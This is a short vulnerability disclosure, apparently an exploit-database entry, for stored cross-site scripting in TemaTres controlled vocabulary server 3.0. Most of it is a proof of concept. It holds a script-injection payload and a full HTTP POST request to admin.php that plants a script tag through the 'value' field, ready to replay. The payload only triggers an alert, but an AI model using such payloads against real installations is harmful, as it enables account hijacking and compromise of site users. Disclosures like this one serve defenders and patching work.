TemaTres: controlled vocabulary server 3.0 — Stored Cross-site scripting
Description: Web application for management formal representations of knowledge, thesauri, taxonomies and multilingual vocabularies / Aplicación para la gestión de representaciones formales del conocimiento, tesauros, taxonomías, vocabularios multilingües.
References: https://sourceforge.net/p/tematres/mailman/tematres-help/
https://github.com/tematres/TemaTres-Vocabulary-Server/commits/master
Proof Of Concept
PAYLOAD: “><script>alert(“XSS”)<%2fscript>
POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
Upgrade-Insecure-Requests: 1
doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(1)%3c%2fscript%3edx6e1&alias=ACX&orden=2